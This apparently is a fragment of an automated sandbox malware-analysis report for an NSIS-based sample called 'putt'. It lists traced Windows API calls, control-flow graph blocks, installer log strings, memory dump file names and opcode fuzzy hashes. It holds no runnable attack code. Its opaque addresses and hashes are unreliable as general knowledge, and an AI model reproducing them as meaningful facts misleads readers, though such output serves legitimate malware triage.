                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc

Control-flow Graph

[Figure: control-flow graph beginning at block 405958-405970; legend: executed / not executed]
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                      • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                    • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                    • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                    • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                    • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                                                                                                    • API String ID: 4286501637-2478300759
                                                                                                                                                                                                                                                    • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00424579,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                    • String ID: (]C$... %d%%$pAB$yEB
                                                                                                                                                                                                                                                    • API String ID: 651206458-486274953
                                                                                                                                                                                                                                                    • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                    • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2568930968-0
                                                                                                                                                                                                                                                    • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                    • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                    • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                                                                                                    • API String ID: 247603264-1827671502
                                                                                                                                                                                                                                                    • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                    • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                    • String ID: HideWindow
                                                                                                                                                                                                                                                    • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                    • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                    • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                                                                                    • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                    • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                    • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                    • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                                                    • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                    • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                    • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                    • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C